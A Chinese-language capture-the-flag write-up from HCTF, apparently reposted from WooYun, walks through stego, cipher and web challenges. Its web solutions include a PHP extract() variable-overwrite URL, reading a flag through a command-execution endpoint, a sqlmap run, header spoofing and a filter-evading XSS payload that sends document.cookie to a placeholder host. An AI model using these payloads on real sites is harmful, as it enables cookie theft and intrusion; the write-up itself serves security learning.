<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/tips/4070

            丘比龍的最愛 10pt

            傳說,丘比龍是丘比特的弟弟,丘比龍是一只小愛神,雖然有兩只翅膀,但因為吃多了,導致身體太胖,所以飛不起來~那么問題來了?!丘比龍吃什么食物吃多了變胖了

            很明顯了,百度一下答案是甜甜圈

            nvshen 100pt

            貓流大大發現一個女神,你能告訴我女神的名字么(名字即是flag) 下載zip后是一個疑似base64的密文,用base64解密后發現png圖片頭 后綴改為png

            enter image description here

            圖片放到百度識圖 得到名字

            flag:愛新覺羅啟星
            

            GIFT 100pt

            打開網站 在注釋處發現一個文件 index.php.bak 內容為

            <?php
            $flag=‘xxx';
            extract($_GET);
            if(isset($gift))
            {
            $content=trim(file_get_contents($flag));
            if($gift==$content)
            {
            echo’hctf{...}';
            }
            else
            {
            echo’Oh..';
            }
            }
            ?>
            

            構造如下URL:

            http://121.40.86.166:39099/index.php?gift=&flag=
            

            覆蓋掉flag變量

            flag: hctf{Awe3ome_Ex7ract!!!}
            

            Entry 200pt

            57R9S980RNOS49973S757PQO9S80Q36P 聽說丘比龍一口氣能吃”13”個甜甜圈呢!

            剛開始各種進制轉換,后來注意道13這個數字,剛好密文處是13個字母,于是把字母轉成 ASCII然后加13后轉字符,然后插到原來的位置,最后cmd5解密

            flag: Qoobee
            

            FIND 200pt

            把圖片下載下來用Stegsolve神器在隨機圖層發現二維碼,把二維碼修復一下 白色的改成黑色的 黑色的改成白色的 然后掃一下就出來flag了

            enter image description here

            flag{hctf_3xF$235#\x5e3}

            IRC 300pt

            進入官方IRC頻道,挨個找人whois

            命令 /whois xxx(昵稱) 其中有幾個人反彈了flag 提交幾個后終于正確了

            enter image description here

            opensource 300pt

            開源?閉源?

            在robots.txt文件下發現 .git隱藏目錄 根據git說明 得到分支文件

            refs/heads/master
            

            下載后得到 hash值 e52b59bc730f13d999b1f2452ca3f689850ca0a3

            然后進入e5/目錄訪問2b59bc730f13d999b1f2452ca3f689850ca0a3 文件 hash前二位目錄 后32位文件名 詳情可以去百度看一下 git的目錄結構 依此類推 配合 (git cat-file -p 接40位hash )命令 讀取項目文件 是當前網站的源代碼 node.js

            部分代碼:

            // view engine setup
            app.set('views', path.join(__dirname, 'views'));
            app.set('view engine', 'jade');
            
            app.use(favicon());
            app.use(logger('dev'));
            app.use(bodyParser.json());
            app.use(bodyParser.urlencoded());
            app.use(cookieParser());
            
            app.use('/', routes);
            app.use('/ac6555bfe23f5fe7e98fdcc0cd5f2451', pangci);
            —————————————————————————————-
            
            var express = require('express');
            var router = express.Router();
            var fs = require('fs');
            var path = require('path');
            var cp = require('child_process');
            
            router.get('/', function(req, res) {
              var data = path.normalize('/tmp/flag');
            
              if (req.param('pangci')) {
                cp.exec(secure(req.param('pangci')) + ' ' + data, function (err, stdout, stderr) {
                  if (err) { res.end('Ohhhhh MY SWEET!!!YOOOOOO HURT ME!!') }
                  var limit = stdout.split('\n').slice(0, 5).join('\n');
                  res.end(limit);
                });
              } else {
                res.end('HEY MY SWEET!!! I LOVE YOOOOOOOO!!!');
              }
            
            });
            
            function secure (str) {
              return str.replace(/[^\d\-a-zA-Z ]/g, '');
            }
            

            訪問

            /ac6555bfe23f5fe7e98fdcc0cd5f2451?pangci=wc 
            

            返回

            142   735 11507 /tmp/flag
            

            表示有142行

            利用tail -n num 命令 一次讀取5行

            最后進行拼接得到 flag

            enter image description here

            FUCKME 350pt

            打開網頁各種語種,想到用詞頻分析進行解密,利用軟件統計頻率前26個字 用記事本或者腳本替換成26個英文字母 然后用下面這個網站進行解密

            http://www.quipqiup.com/index.php

            flag:hctf{enjoyyourselfinhctf}
            

            jianshu 400pt

            這題有點坑,首先比較輕松的xss到了cookie,

            <svg><scscriptript>window.locatioonn=“http://xxx.com/cookie.php?cookie=“%26%2343%3Bescape(document.cookie);</scscriptript></svg>
            

            然后cookie里確實有flag flag=NOT IN COOKIE嘗試提交這個不對 然后在cookie.php進行修改 獲取客戶端的http頭信息

            Referer: http://121.41.37.11:25045/get.php?user=V1ew
            X-Forwarded-For: 218.75.123.186
            

            偽造http頭訪問改url 還是沒有發現cookie 然后據說不是xss 是sql注入 然后各種參數,各種注

            然后最后的注入的點為;

            http://121.41.37.11:25045/img.php?file=1*.jpg
            

            之前嘗試了整個file參數發現注不了,其實是要注.jpg前面的值

            sqlmap —level 6 —dbs
            

            跑出數據庫

            enter image description here

            訪問

            http://121.41.37.11:25045/get.php?user=A1rB4s1C
            

            提示IP不對 用之前X到的IP進行偽造 最后返回flag

            flag: hctf{Why_are_U_S0_DIA0?????}
            

            enter image description here

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线